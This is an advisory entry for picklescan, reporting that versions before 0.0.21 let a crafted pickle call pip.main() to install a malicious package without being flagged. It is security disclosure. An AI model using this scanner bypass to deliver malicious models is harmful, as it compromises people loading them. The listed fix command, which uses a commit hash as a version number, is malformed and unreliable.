—

PYSEC-2025-18

Details

picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / picklescan

Introduced in: 0 Fixed in: 78ce704227c51f070c0c5fb4b466d92c62a7aa3d

Fix pip install --upgrade 'picklescan>=78ce704227c51f070c0c5fb4b466d92c62a7aa3d'

References

https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v [ADVISORY]
https://github.com/mmaitre314/picklescan/commit/78ce704227c51f070c0c5fb4b466d92c62a7aa3d [FIX]
https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1716 [WEB]